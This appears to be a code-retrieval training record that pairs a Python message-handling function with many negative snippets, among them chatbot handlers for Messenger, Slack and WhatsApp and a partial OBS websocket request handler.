def respond_to_message(self): MessageEventHandler(self.state, self.meta_data, self.message_data).handle_events(events=self.events) data = Converter(self.state).get_messages(meta_data=self.meta_data, message_data=self.message_data) outgoing_messages = data.get("messages", []) events_to_publish = data.get("publish_events", []) agent_messages = [message["message"] for message in outgoing_messages if message["sending_to"] == "AGENT"] user_messages = [message["message"] for message in outgoing_messages if message["sending_to"] == "USER"] agent_response = Util.send_messages(messages=agent_messages, sending_to="AGENT") user_response = Util.send_messages(messages=user_messages, sending_to="USER") if agent_response or user_response: Util.update_state(meta_data=self.meta_data, state=self.state) Util.log_events(meta_data=self.meta_data, state=self.state, events=events_to_publish) return 1
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def process_messages(self):\n pass", "def handle_message(self, message):", "def handle_messages():\n print(\"Handling Messages\")\n payload = request.get_data()\n for sender, incoming_message, payload in messaging_events(payload):\n # The following statements check which options the user selected\n # Response handler contains \"templates\" for the various messages\n user_name = get_full_name(sender, PAT)\n if \"hei\" in incoming_message.lower() or \"hallo\" in incoming_message.lower() or \"yo\" in incoming_message.lower()\\\n or \"hi\" in incoming_message.lower():\n send_message(PAT, send_message(PAT, response_handler.greeting_message(sender, user_name)))\n if user_methods.has_user(user_name):\n send_message(PAT, response_handler.has_course(sender, user_methods.get_subject_from_user(user_name)))\n else:\n send_message(PAT, response_handler.no_course(sender))\n\n elif payload == \"change subject\" or \"change subject\" in incoming_message.lower():\n send_message(PAT, response_handler.text_message(sender, \"You can change course at any time simply by \"\n \"writing the course code on the form [TAG][CODE]\\n\"\n \"ex. TDT4120\"))\n send_message(PAT, response_handler.has_course(sender, user_methods.get_subject_from_user(user_name)))\n\n elif \"help\" in incoming_message.lower():\n\n send_message(PAT, response_handler.text_message(sender, \"Are you lost ...? \"))\n send_message(PAT, response_handler.text_message(sender, \"You can change course at any time simply by \"\n \"writing the course code on the form: [TAG][CODE]\\n\"\n \"ex. TDT4120\"))\n send_message(PAT, response_handler.text_message(sender, \"If you want to see your currently selected course \"\n \"and other information type 'Status'.\"))\n send_message(PAT, response_handler.text_message(sender, \"You can also type 'Hei' or 'Hallo' at any time \"\n \"to receive a greeting that shows your options.\"))\n send_message(PAT, response_handler.text_message(sender, \"Here is a list of commands you can use. This is \"\n \"recommended for the experienced user:\\n\"\n \"Change subject\\n\"\n \"Give feedback\\n\"\n \"How did today's lecture go?\\n\"\n \"Get schedule\\n\"\n \"Get info\\n\"\n \"All lectures\\n\"\n \"A specific lecture\\n\"\n \"You can type most of the commands in chat. Just \"\n \"give it a try!\"))\n send_message(PAT, response_handler.has_course(sender, user_methods.get_subject_from_user(user_name)))\n\n elif \"status\" in incoming_message.lower():\n subject = user_methods.get_subject_from_user(user_name)\n year = feedback_methods.get_year()\n week = feedback_methods.get_week()\n day = feedback_methods.get_day()\n user = get_full_name(sender, PAT)\n lecture_id_current = lecture_methods.get_lecture_from_date(year, week, day, subject)\n lecture = feedback_methods.get_lecture_object(lecture_id_current)\n\n if user_methods.has_user(user_name):\n sub = user_methods.get_subject_from_user(user_name) + \" : \" + \\\n subject_info.course_name(user_methods.get_subject_from_user(user_name))\n send_message(PAT, response_handler.user_info(sender, user_name, sub))\n if feedback_methods.user_has_feedback_for_lecture(user, lecture):\n send_message(PAT, response_handler.text_message(sender, \"You have given feedback for \"\n + subject + \"today. Well done! Be proud of \"\n \"yourself and remember to check in \"\n \"tomorrow.\"))\n send_message(PAT,\n response_handler.has_course(sender, user_methods.get_subject_from_user(user_name)))\n else:\n send_message(PAT, response_handler.text_message(sender,\n \"No feedback for the given lecture on this date. \"\n \"Please press 'Give Feedback' or write it in the \"\n \"chat to do so.\"))\n send_message(PAT,\n response_handler.has_course(sender, user_methods.get_subject_from_user(user_name)))\n else:\n send_message(PAT, response_handler.text_message(sender,\n \"We seem to not be able to detect you in the database. \"\n \"Please report this to the staff!\"))\n send_message(PAT, response_handler.has_course(sender, user_methods.get_subject_from_user(user_name)))\n\n # Checks if the subject has lectures in the database, adds them if not.\n\n elif payload == \"give feedback\" or \"give feedback\" in incoming_message.lower():\n send_message(PAT, response_handler.give_feedback_choice(sender))\n\n elif payload == \"lecture speed\" or \"lecture speed\" in incoming_message.lower():\n\n subject = user_methods.get_subject_from_user(user_name)\n\n if lecture_methods.check_lecture_in_db(subject):\n send_message(PAT, response_handler.lec_feed(sender))\n else:\n schedule = subject_info.get_schedule(subject)\n if schedule:\n database_entry = subject_info.gather_lecture_information(schedule)\n lecture_methods.add_lecture_information_db(database_entry)\n send_message(PAT, response_handler.text_message(sender, \"Lectures for the subject \" + subject +\n \" were not in the database. It is now added.\"))\n send_message(PAT, response_handler.lec_feed(sender))\n else:\n send_message(PAT, response_handler.text_message(sender, \"Lectures for the subject \" + subject +\n \" does not exist. Likely due to the subject having \"\n \"no lectures this semester.\"))\n send_message(PAT, response_handler.has_course(sender, subject))\n\n elif payload == \"evaluation_questions\" or \"lecture questions\" in incoming_message.lower():\n # User wants to give feedback for a lecture.\n subject = user_methods.get_subject_from_user(user_name)\n payload = \"evaluation_questions\" # if user typed 'lecture questions' the payload will be None\n\n if lecture_methods.check_lecture_in_db(subject):\n if feedback_methods.user_can_give_feedback_evaluation(user_name,\n user_methods.get_subject_from_user(user_name)):\n send_message(PAT, response_handler.lecture_feedback_questions(sender, payload))\n else:\n send_message(PAT, response_handler.text_message(sender,\n \"Feedback can not be given either because there \"\n \"is no lecture today, or because you have already \"\n \"given feedback for this lecture.\"))\n send_message(PAT, response_handler.has_course(sender, subject))\n else:\n schedule = subject_info.get_schedule(subject)\n if schedule:\n database_entry = subject_info.gather_lecture_information(schedule)\n lecture_methods.add_lecture_information_db(database_entry)\n send_message(PAT, response_handler.text_message(sender, \"Lectures for the subject \" + subject +\n \" were not in the database. It is now added\"))\n if feedback_methods.user_can_give_feedback_evaluation(user_name,\n user_methods.get_subject_from_user(\n user_name)):\n send_message(PAT, response_handler.lecture_feedback_questions(sender, payload))\n else:\n send_message(PAT, response_handler.text_message(sender,\n \"Feedback can not be given either because \"\n \"there is no lecture today, or because you\"\n \" have already given feedback for this lecture.\"\n \"\"))\n send_message(PAT, response_handler.has_course(sender, subject))\n else:\n send_message(PAT, response_handler.text_message(sender, \"Lectures for the subject \" + subject +\n \"does not exist. Likely due to the subject having \"\n \"no \"\n \"lectures this semester.\"))\n send_message(PAT, response_handler.has_course(sender, subject))\n\n elif \"too slow\" in incoming_message.lower():\n # Adds feedback if the subject has a lecture on the given day\n # and if the user has not already given feedback\n payload = '0'\n message_response = \"too slow\"\n if feedback_methods.add_entry(user_name, user_methods.get_subject_from_user(user_name), payload):\n send_message(PAT, response_handler.text_message(sender, \"You chose: \" + \"'\" +\n message_response + \"'\" + \"\\nFeedback Received!\"))\n send_message(PAT, response_handler.has_course(sender, user_methods.get_subject_from_user(user_name)))\n else:\n send_message(PAT,\n response_handler.text_message(sender, \"There is either no lecture active in the selected\"\n \" subject, or you have already given feedback\"\n \" to the active lecture.\\nFeedback denied!\"))\n send_message(PAT, response_handler.has_course(sender, user_methods.get_subject_from_user(user_name)))\n\n elif \"it's all right\" in incoming_message.lower() or \"its all right\" in incoming_message.lower():\n # Adds feedback if the subject has a lecture on the given day\n # and if the user has not already given feedback\n payload = '1'\n message_response = \"It's all right\"\n if feedback_methods.add_entry(user_name, user_methods.get_subject_from_user(user_name), payload):\n send_message(PAT, response_handler.text_message(sender, \"You chose: \" + \"'\" +\n message_response + \"'\" + \"\\nFeedback Received!\"))\n send_message(PAT, response_handler.has_course(sender, user_methods.get_subject_from_user(user_name)))\n else:\n send_message(PAT,\n response_handler.text_message(sender, \"There is either no lecture active in the selected\"\n \" subject, or you have already given feedback\"\n \" to the active lecture.\\nFeedback denied!\"))\n send_message(PAT, response_handler.has_course(sender, user_methods.get_subject_from_user(user_name)))\n\n elif \"too fast\" in incoming_message.lower():\n # Adds feedback if the subject has a lecture on the given day\n # and if the user has not already given feedback\n payload = '2'\n message_response = \"too fast\"\n if feedback_methods.add_entry(user_name, user_methods.get_subject_from_user(user_name), payload):\n send_message(PAT, response_handler.text_message(sender, \"You chose: \" + \"'\" +\n message_response + \"'\" + \"\\nFeedback Received!\"))\n send_message(PAT, response_handler.has_course(sender, user_methods.get_subject_from_user(user_name)))\n else:\n send_message(PAT,\n response_handler.text_message(sender, \"There is either no lecture active in the selected\"\n \" subject, or you have already given feedback\"\n \" to the active lecture.\\nFeedback denied!\"))\n send_message(PAT, response_handler.has_course(sender, user_methods.get_subject_from_user(user_name)))\n\n elif (\"today\" in incoming_message.lower() and \"lecture\" in incoming_message.lower()) or \\\n (\"todays\" in incoming_message.lower() and \"lecture\" in incoming_message.lower()) or \\\n (\"today's\" in incoming_message.lower() and \"lecture\" in incoming_message.lower()):\n # Gathers the correct information about the date.\n year = feedback_methods.get_year()\n week = feedback_methods.get_week()\n day = feedback_methods.get_day()\n subject = user_methods.get_subject_from_user(user_name)\n # Gathers the feedback from today's lecture:\n if lecture_methods.check_lecture_in_db(subject):\n feedback_list = feedback_methods.get_single_lecture_feed(year, week, day, subject)\n if feedback_list[0] is not None:\n send_message(PAT, response_handler.present_single_lecture_feedback(sender, feedback_list))\n send_message(PAT,\n response_handler.has_course(sender, user_methods.get_subject_from_user(user_name)))\n else:\n send_message(PAT, response_handler.text_message(sender,\n \"No feedback for the given lecture on this date. \"\n \"Please try again at a later date.\"))\n send_message(PAT,\n response_handler.has_course(sender, user_methods.get_subject_from_user(user_name)))\n else:\n send_message(PAT, response_handler.text_message(sender, \"No lecture present in the database. \"\n \"Please provide some feedback and try again.\"))\n send_message(PAT, response_handler.has_course(sender, user_methods.get_subject_from_user(user_name)))\n\n elif payload == \"get schedule\" or \"get schedule\" in incoming_message.lower():\n subject = user_methods.get_subject_from_user(user_name)\n schedule = subject_info.printable_schedule(subject_info.get_schedule(subject))\n if len(schedule) > 640:\n msg_list = message_split.message_split(schedule)\n for msg in msg_list:\n print(msg)\n send_message(PAT, response_handler.text_message(sender, msg))\n else:\n send_message(PAT, response_handler.text_message(sender, schedule))\n send_message(PAT, response_handler.has_course(sender, user_methods.get_subject_from_user(user_name)))\n\n elif payload == \"get info\" or \"get info\" in incoming_message.lower():\n subject = user_methods.get_subject_from_user(user_name)\n send_message(PAT, response_handler.text_message(sender,\n subject_info.printable_course_info(\n subject_info.get_course_json(subject))))\n send_message(PAT, response_handler.has_course(sender, user_methods.get_subject_from_user(user_name)))\n\n elif payload == \"get feedback\" or \"get feedback\" in incoming_message.lower():\n send_message(PAT, response_handler.get_feedback_specific_or_all(sender))\n\n elif payload == \"all_lectures\" or \"all lectures\" in incoming_message.lower():\n # The user wants to see feedback for all lectures in the selected subject\n subject = user_methods.get_subject_from_user(user_name)\n if not lecture_methods.check_lecture_in_db(subject):\n send_message(PAT, response_handler.text_message(sender, \"Course has no feedback.\"))\n send_message(PAT, response_handler.has_course(sender, user_methods.get_subject_from_user(user_name)))\n else:\n feedback, feedbackevaluation = feedback_methods.get_all_subject_feed(subject)\n if len(feedback) > 0:\n percent_list = bot_feedback.generate_percent_for_speed(feedback)\n send_message(PAT, response_handler.all_feedback_speed(sender, subject, percent_list))\n else:\n send_message(PAT,\n response_handler.text_message(sender, \"Course has no feedback for lecture speed.\"))\n if len(feedbackevaluation) > 0:\n percent_list_questions = bot_feedback.generate_percent_for_questions(feedbackevaluation)\n\n send_message(PAT, response_handler.all_feedback_questions(sender, subject, percent_list_questions))\n else:\n send_message(PAT,\n response_handler.text_message(sender, \"Course has no feedback for lecture questions.\"))\n send_message(PAT, response_handler.has_course(sender, user_methods.get_subject_from_user(user_name)))\n\n elif payload == \"a_specific_lecture\" or \"a specific lecture\" in incoming_message.lower():\n # Let the user choose what year to get feedback from.\n years = lecture_feedback_db_methods.get_year(user_methods.get_subject_from_user(user_name))\n if len(years) > 0:\n send_message(PAT, response_handler.get_feedback_year(sender, years))\n else:\n send_message(PAT, response_handler.text_message(sender, 'No feedback for the selected subject.'))\n send_message(PAT, response_handler.has_course(sender, user_methods.get_subject_from_user(user_name)))\n\n elif payload is not None:\n # Underneath are check that use .split() on the payload.\n if \"evaluation_questions\" in payload.split()[0]:\n payload_split = payload.split()\n if len(payload_split) == 1:\n # 1st question\n send_message(PAT, response_handler.lecture_feedback_questions(sender, payload))\n elif len(payload_split) == 2:\n # 2nd question\n send_message(PAT, response_handler.lecture_feedback_questions(sender, payload))\n elif len(payload_split) == 3:\n # 3rd question\n send_message(PAT, response_handler.lecture_feedback_questions(sender, payload))\n elif len(payload_split) == 4:\n # 4th question\n send_message(PAT, response_handler.lecture_feedback_questions(sender, payload))\n elif len(payload_split) == 5:\n # 5th question\n send_message(PAT, response_handler.lecture_feedback_questions(sender, payload))\n elif len(payload_split) == 6:\n # 6th question\n send_message(PAT, response_handler.lecture_feedback_questions(sender, payload))\n elif len(payload_split) == 7:\n # 7th question\n send_message(PAT, response_handler.lecture_feedback_questions(sender, payload))\n elif len(payload_split) == 8:\n # store feedback.\n subject = user_methods.get_subject_from_user(user_name)\n if feedback_methods.add_feedback_evaluation(user_name, subject, int(payload_split[1]),\n int(payload_split[2]), int(payload_split[3]),\n int(payload_split[4]), int(payload_split[5]),\n int(payload_split[6]), int(payload_split[7])):\n # Storing the feedback succeeded.\n send_message(PAT, response_handler.text_message(sender, 'Feedback received!'))\n send_message(PAT, response_handler.has_course(sender, subject))\n else:\n # Storing the feedback failed.\n send_message(PAT, response_handler.text_message(sender,\n \"There is either no lecture active in the \"\n \"selected subject, or you have already given \"\n \"feedback to the active lecture.\\n Feedback \"\n \"denied!\"))\n send_message(PAT, response_handler.has_course(sender, subject))\n pass\n\n elif \"get_lecture_feedback_year\" in payload.split()[0]:\n # Let the user choose what semester to get feedback from.\n semesters = []\n if lecture_feedback_db_methods.check_lecture_semester(user_methods.get_subject_from_user(user_name),\n 1, 17, int(payload.split()[1])):\n semesters.append('Spring')\n elif lecture_feedback_db_methods.check_lecture_semester(user_methods.get_subject_from_user(user_name),\n 32, 49, int(payload.split()[1])):\n semesters.append('Fall')\n if len(semesters) > 0:\n send_message(PAT, response_handler.get_feedback_semester(sender, payload.split()[1], semesters))\n else:\n # Take the user one step up to choose a different year.\n years = lecture_feedback_db_methods.get_year(user_methods.get_subject_from_user(user_name))\n send_message(PAT, response_handler.get_feedback_year(sender, years))\n\n elif \"get_lecture_feedback_semester\" in payload.split()[0]:\n # Let the user choose what weeks to get feedback from.\n\n week_list = lecture_feedback_db_methods.get_lecture_weeks(user_methods.get_subject_from_user(user_name),\n int(payload.split()[1]), payload.split()[2])\n if len(week_list) > 8:\n send_message(PAT, response_handler.get_feedback_month(sender, payload.split()[1], week_list))\n else:\n send_message(PAT, response_handler.get_feedback_week(sender, payload.split()[1], week_list))\n\n elif \"get_lecture_feedback_month\" in payload.split()[0]:\n # Let the user select week\n week_list = []\n payload_split = payload.split()\n for i in range(2, len(payload_split)):\n week_list.append(int(payload_split[i].rstrip(',')))\n\n send_message(PAT, response_handler.get_feedback_week(sender, payload_split[1], week_list))\n\n elif \"get_lecture_feedback_week\" in payload.split()[0]:\n # Lets the user select day\n lecture_days = lecture_feedback_db_methods.get_day_of_lecture_in_week(\n user_methods.get_subject_from_user(user_name), payload.split()[1], payload.split()[2])\n\n send_message(PAT, response_handler.get_feedback_day(sender, payload.split()[1], lecture_days,\n payload.split()[2]))\n\n elif \"get_lecture_feedback_day\" in payload.split()[0]:\n\n subject = user_methods.get_subject_from_user(user_name)\n # Gives the user feedback from the selected day.\n feedback_list = feedback_methods.get_single_lecture_feed(payload.split()[1],\n payload.split()[2],\n payload.split()[3],\n subject)\n feedback_questions_list = feedback_methods.get_single_lecture_feedback_questions(payload.split()[1],\n payload.split()[2],\n payload.split()[3],\n subject)\n\n if len(feedback_list[1]) > 0: # Checks if there is feedback in the variable.\n send_message(PAT, response_handler.present_single_lecture_feedback(sender, feedback_list))\n else:\n send_message(PAT, response_handler.text_message(sender,\n \"This lecture has no feedback for lecture speed.\"))\n if len(feedback_questions_list) > 0: # Checks if there is feedback in the variable.\n feedback_questions = bot_feedback.generate_percent_for_questions(feedback_questions_list)\n send_message(PAT,\n response_handler.present_single_lecture_feedback_questions(sender, feedback_questions))\n else:\n send_message(PAT, response_handler.text_message(sender,\n \"This lecture has no feedback for lecture \"\n \"questions.\"))\n\n send_message(PAT, response_handler.has_course(sender, user_methods.get_subject_from_user(user_name)))\n\n elif ime_data_fetch.subject_exists_boolean(incoming_message.upper().split()[0]):\n if user_methods.has_user(user_name):\n user_methods.add_subject(user_name, incoming_message.split()[0])\n else:\n user_methods.add_user(user_name, incoming_message.split()[0])\n send_message(PAT, response_handler.has_course(sender, user_methods.get_subject_from_user(user_name)))\n\n else:\n send_message(PAT, response_handler.text_message(sender,\n \"Type 'help' to see what you can do with L.I.M.B.O.\\n If \"\n \"you tried to enter a subject-code and got this message,\"\n \" you either misspelled it or the subject you are looking \"\n \"for is not a subject at NTNU.\"))\n if user_methods.has_user(user_name):\n send_message(PAT, response_handler.has_course(sender, user_methods.get_subject_from_user(user_name)))\n else:\n send_message(PAT, response_handler.no_course(sender))\n\n return \"ok\"", "def msg_event(self, event):\r\n pass", "def respond_to_events(self):\n event_response = MessageEventHandler(self.state, self.meta_data, self.message_data).handle_events(events=self.events)\n\n if event_response == []:\n return {}\n return event_response[0]", "def on_message(data):\n pass", "def list_messages(self):", "def _handle_message(self, msg):\n self.event('message', msg)", "def receive_message(self, context, message):\r\n pass", "def receive_message(self, message):", "def listen_for_any_message(self, msg, match):\n question=\"{}\".format(msg)\n return self.cbmodel.get_response(question)", "def handle_message(self, msg):\n pass", "def get_response(self):\n return self.messages", "def get_messages(self):\n print(\"Adding callback...\")\n self.__class__.callbacks.add(self._callback)\n #print(self.__class__.callbacks)", "def handle_event(event_data):\n # define variable of data\n message = event_data.get('event')\n channel = message.get('channel')\n msg = message.get('text').lower()\n userid = message.get('user')\n username = convert_unicode(sc.api_call('users.info', user=userid)).get('user').get('profile').get('display_name')\n text = None\n print(msg)\n\n if \"tasks\" in msg or \"task\" in msg:\n ret_data = fb.display_list('Business', False)\n ret_data = filter(lambda x:username in [names.strip() for names in x[2].split(',')], ret_data)\n text = \"Click <http://team8tasks.serveo.net|here> to go to the Task Website\\n\"\n ongoing_tasks = return_tasks(ret_data, 'ongoing')\n overdue_tasks = return_tasks(ret_data, 'overdue')\n completed_tasks = return_tasks(ret_data, 'completed')\n sc.api_call('chat.postMessage', channel=channel, text=text, as_user=True, attachments=[{'text': ongoing_tasks, 'mrkdwn_in': [\"text\"], 'color': '#03572C'}, {'text': overdue_tasks, 'mrkdwn_in': [\"text\"], 'color': '#ff6666'}, {'text': completed_tasks, 'mrkdwn_in': [\"text\"]}])\n return\n elif \"hello\" in msg or \"hi\" in msg or \"hey\" in msg:\n text = \"Hello <@\" + userid + \">! What's up?\"\n elif \"no u\" in msg:\n text = \"no u\"\n else:\n text = 'Sorry I do not know what that command means. Try \"tasks\" to list your tasks.'\n\n sc.api_call('chat.postMessage', channel=channel, text=text, as_user=True)", "def messages(self) -> dict:\n raise NotImplementedError", "def handleMessage(msg):", "def send_messages(self):\n if self.messages:\n messages, self.messages = self.messages, []\n self.mpub(\"events.%s\" % config.pool, messages)", "def message(self):\r\n url = '{0}/{1}'.format(self.get_url(), 'message')\r\n return http.Request('GET', url), parsers.parse_json", "def onMessage(self, message):\n raise NotImplementedError", "def _on_message(self, raw_msg):\n strmsg = raw_msg.decode()\n msg = json.loads(strmsg)\n\n print(msg)\n\n if self._handlers.get(msg['msgid']):\n for handler in self._handlers[msg['msgid']]:\n handler.handle(msg)", "def processMessage(self, *args, **kwargs):\r\n pass", "def receive_message(self, message):\r\n return", "def get_messages(self):\r\n return self.messages", "def get_message(self):\n\n if self.gotten: return\n self.get_recipients()\n self.get_text()\n self.get_price()\n self.get_files()\n self.set_text()\n if Settings.get_performer_category() or self.hasPerformers:\n self.get_performers()\n else:\n self.performers = \"unset\"\n self.gotten = True", "def on_event():\n event = request.get_json()\n if event['type'] == 'ADDED_TO_SPACE' and not event['space']['singleUserBotDm']:\n text = 'Thanks for adding me to \"%s\"!' % (event['space']['displayName'] if event['space']['displayName'] else 'this chat')\n elif event['type'] == 'MESSAGE':\n text = 'You said: `%s`' % str(chat_service.spaces().list().execute()) #event['message']['text']\n else:\n return\n return json.jsonify({'text': text, 'thread':\"chet_cool\"})", "def run(self):\n alogger.info(\"Recieved message from %s, Message: (%d) %s\" % (self.client.getaddress(), self.action_type, self.message))\n \n #Try to call th function associated with this message type.\n #format = \"handle_<type>\" (eg: handle_100)\n fn = globals().get(\"handle_\" + str(self.action_type))\n if fn and callable(fn):\n fn(self.message, self.address, self.client)\n else:\n alogger.info(\"Received unknown message from %d, type: %d\" % (self.client.getaddress(), self.action_type))", "def msg_handler(self, msg):\n self.view.frame.log.append(msg)", "def process_chatter(self, msg):\n # note, nothing in here is ROS specific, it's just python code that\n # runs when new info appears\n\n print msg.data # print the recieved message\n\n self.msgs_recieved += 1 # increase msg count\n self.msgs_recieved %= 500 # mod 500 so we don't get enormous numbers\n self.msg = \"%d messages recieved\" % self.msgs_recieved # set message", "def handle_messages(self):\n\n #Get the time at which the code started running\n current_time = datetime.datetime.now()\n\n #get all messages between now and the time where a message was last received\n messages = self.client.messages.list(\n date_sent_before = datetime.datetime.now()+ datetime.timedelta(hours = TIMEDIFFERENCE),\n date_sent_after = self.last_message_timing + datetime.timedelta(hours = TIMEDIFFERENCE)\n )\n\n #Iterate through all the new messages\n for record in messages:\n #If it is not from the Twilio Client\n if record.from_ != 'whatsapp:+14155238886':\n #Then update the timing of the last message to the current time\n self.last_message_timing = current_time\n #If the message sent is the '?' that seeks to get the number\n #of people in the queue\n if record.body == '?':\n #Get the data about people from firebase\n people_data = self.firebase.get_data('people_count')\n #Get the number of people queueing\n no_of_people = people_data['people_count']\n #Create a message from the API to tell the person\n #asking the number of people in the queue\n message = self.client.messages.create(\n body='The number of the people in the queue is {}'.format(no_of_people),\n from_='whatsapp:{sender_number}'.format(**self.config),\n to=record.from_\n )", "def handle(self, message):", "def handle(self) -> None:\r\n\r\n if self.data.get(\"message-id\") != None:\r\n if self.data[\"status\"] == \"error\":\r\n print(self.data[\"error\"])\r\n return\r\n else:\r\n requestData = self.obs.pendingResponses.pop(self.data[\"message-id\"])\r\n request = requestData[\"request-type\"]\r\n #Requests as of version 4.8.0\r\n\r\n #General\r\n if request == \"GetVersion\":\r\n pass\r\n\r\n elif request == \"GetAuthRequired\":\r\n if self.data[\"authRequired\"]:\r\n secret_string: str = self.obs.password + self.data[\"salt\"]\r\n secret_hash: sha256 = sha256(secret_string.encode(\"utf-8\"))\r\n secret: bytes = b64encode(secret_hash.digest())\r\n\r\n response_string: str = secret.decode(\"utf-8\") + self.data[\"challenge\"]\r\n response_hash: sha256 = sha256(response_string.encode(\"utf-8\"))\r\n response: bytes = b64encode(response_hash.digest())\r\n\r\n self.obs.requests.append({\r\n \"type\": \"Authenticate\",\r\n \"auth\": response.decode(\"utf-8\")})\r\n\r\n else:\r\n self.obs.requests.append({\"type\": \"GetSceneList\"})\r\n\r\n elif request == \"Authenticate\":\r\n self.obs.requests.append({\"type\": \"GetSceneList\"})\r\n\r\n elif request == \"SetHeartbeat\":\r\n #To be removed in 5.0.0\r\n pass\r\n\r\n elif request == \"SetFilenameFormatting\":\r\n pass\r\n\r\n elif request == \"GetFilenameFormatting\":\r\n pass\r\n\r\n elif request == \"GetStats\":\r\n pass\r\n\r\n elif request == \"BroadcastCustomMessage\":\r\n pass\r\n\r\n elif request == \"GetVideoInfo\":\r\n pass\r\n\r\n elif request == \"OpenProjector\":\r\n pass\r\n\r\n elif request == \"TriggerHotkeyByName\":\r\n #Unreleased\r\n pass\r\n\r\n elif request == \"TriggerHotkeyBySequence\":\r\n #Unreleased\r\n pass\r\n\r\n #Media Control\r\n elif request == \"PlayPauseMedia\":\r\n #Unreleased\r\n pass\r\n\r\n elif request == \"RestartMedia\":\r\n #Unreleased\r\n pass\r\n\r\n elif request == \"StopMedia\":\r\n #Unreleased\r\n pass\r\n\r\n elif request == \"NextMedia\":\r\n #Unreleased\r\n pass\r\n\r\n elif request == \"PreviousMedia\":\r\n #Unreleased\r\n pass\r\n\r\n elif request == \"GetMediaDuration\":\r\n #Unreleased\r\n pass\r\n\r\n elif request == \"GetMediaTime\":\r\n #Unreleased\r\n pass\r\n\r\n elif request == \"SetMediaTime\":\r\n #Unreleased\r\n pass\r\n\r\n elif request == \"ScrubMedia\":\r\n #Unreleased\r\n pass\r\n\r\n elif request == \"GetMediaState\":\r\n #Unreleased\r\n pass\r\n\r\n #Sources\r\n\r\n elif request == \"GetMediaSourcesList\":\r\n #Unreleased\r\n pass\r\n\r\n elif request == \"GetSourcesList\":\r\n pass\r\n\r\n elif request == \"GetSourceTypesList\":\r\n pass\r\n\r\n elif request == \"GetVolume\":\r\n pass\r\n\r\n elif request == \"SetVolume\":\r\n pass\r\n\r\n elif request == \"GetMute\":\r\n pass\r\n\r\n elif request == \"SetMute\":\r\n pass\r\n\r\n elif request == \"ToggleMute\":\r\n pass\r\n\r\n elif request == \"GetAudioActive\":\r\n pass\r\n\r\n elif request == \"SetSourceName\":\r\n pass\r\n\r\n elif request == \"SetSyncOffset\":\r\n pass\r\n\r\n elif request == \"GetSyncOffset\":\r\n pass\r\n\r\n elif request == \"GetSourceSettings\":\r\n pass\r\n\r\n elif request == \"SetSourceSettings\":\r\n pass\r\n\r\n elif request == \"GetTextGDIPlusProperties\":\r\n pass\r\n\r\n elif request == \"SetTextGDIPlusProperties\":\r\n pass\r\n\r\n elif request == \"GetTextFreetype2Properties\":\r\n pass\r\n\r\n elif request == \"SetTextFreetype2Properties\":\r\n pass\r\n\r\n elif request == \"GetBrowserSourceProperties\":\r\n pass\r\n\r\n elif request == \"SetBrowserSourceProperties\":\r\n pass\r\n\r\n elif request == \"GetSpecialSources\":\r\n pass\r\n\r\n elif request == \"GetSourceFilters\":\r\n source = self.obs.getSource(requestData[\"sourceName\"])\r\n if source != None:\r\n for _filter in self.data[\"filters\"]:\r\n source.addFilter(_filter) #type: ignore\r\n\r\n elif request == \"GetSourceFilterInfo\":\r\n pass\r\n\r\n elif request == \"AddFilterToSource\":\r\n pass\r\n\r\n elif request == \"RemoveFilterFromSource\":\r\n pass\r\n\r\n elif request == \"ReorderSourceFilter\":\r\n pass\r\n\r\n elif request == \"MoveSourceFilter\":\r\n pass\r\n\r\n elif request == \"SetSourceFilterSettings\":\r\n pass\r\n\r\n elif request == \"SetSourceFilterVisibility\":\r\n pass\r\n \r\n elif request == \"GetAudioMonitorType\":\r\n pass\r\n\r\n elif request == \"SetAudioMonitorType\":\r\n pass\r\n\r\n elif request == \"TakeSourceScreenshot\":\r\n pass\r\n\r\n #Outpute\r\n elif request == \"ListOutputs\":\r\n pass\r\n\r\n elif request == \"GetOutputInfo\":\r\n pass\r\n\r\n elif request == \"StartOutput\":\r\n pass\r\n\r\n elif request == \"StopOutput\":\r\n pass\r\n\r\n #Profiles\r\n elif request == \"SetCurrentProfile\":\r\n pass\r\n\r\n elif request == \"GetCurrentProfile\":\r\n pass\r\n\r\n elif request == \"ListProfiles\":\r\n pass\r\n\r\n #Recording\r\n elif request == \"GetRecordingStatus\":\r\n #Unreleased\r\n pass\r\n\r\n elif request == \"StartStopRecording\":\r\n pass\r\n\r\n elif request == \"StartRecording\":\r\n pass\r\n\r\n elif request == \"StopRecording\":\r\n pass\r\n\r\n elif request == \"PauseRecording\":\r\n pass\r\n\r\n elif request == \"ResumeRecording\":\r\n pass\r\n\r\n elif request == \"SetRecordingFolder\":\r\n pass\r\n\r\n elif request == \"GetRecordingFolder\":\r\n pass\r\n\r\n #Replay Buffer\r\n elif request == \"GetReplayBufferStatus\":\r\n #Unreleased\r\n pass\r\n\r\n elif request == \"StartStopReplayBuffer\":\r\n pass\r\n\r\n elif request == \"StartReplayBuffer\":\r\n pass\r\n\r\n elif request == \"StopReplayBuffer\":\r\n pass\r\n\r\n elif request == \"SaveReplayBuffer\":\r\n pass\r\n\r\n #Scene Collections\r\n elif request == \"SetCurrentSceneCollection\":\r\n pass\r\n\r\n elif request == \"GetCurrentSceneCollection\":\r\n pass\r\n\r\n elif request == \"ListSceneCollections\":\r\n pass\r\n\r\n #Scene Items\r\n elif request == \"GetSceneItemList\":\r\n #Unreleased\r\n pass\r\n\r\n elif request == \"GetSceneItemProperties\":\r\n pass\r\n\r\n elif request == \"SetSceneItemProperties\":\r\n pass\r\n\r\n elif request == \"ResetSceneItem\":\r\n pass\r\n\r\n elif request == \"SetSceneItemRender\":\r\n pass\r\n\r\n elif request == \"SetSceneItemPosition\":\r\n pass\r\n\r\n elif request == \"SetSceneItemTransform\":\r\n pass\r\n\r\n elif request == \"SetSceneItemCrop\":\r\n pass\r\n\r\n elif request == \"DeleteSceneItem\":\r\n pass\r\n\r\n elif request == \"AddSceneItem\":\r\n #Unreleased\r\n pass\r\n\r\n elif request == \"DuplicateSceneItem\":\r\n pass\r\n\r\n #Scenes\r\n elif request == \"SetCurrentScene\":\r\n pass\r\n\r\n elif request == \"GetCurrentScene\":\r\n self.obs.setCurrentScene(self.data[\"name\"])\r\n\r\n elif request == \"GetSceneList\":\r\n for scene in self.data[\"scenes\"]:\r\n self.obs.addScene(scene)\r\n self.obs.setCurrentScene(self.data[\"current-scene\"])\r\n\r\n elif request == \"CreateScene\":\r\n pass\r\n\r\n elif request == \"ReorderSceneItems\":\r\n pass\r\n\r\n elif request == \"SetSceneTransitionOverride\":\r\n pass\r\n\r\n elif request == \"RemoveSceneTransitionOverride\":\r\n pass\r\n\r\n elif request == \"GetSceneTransitionOverride\":\r\n 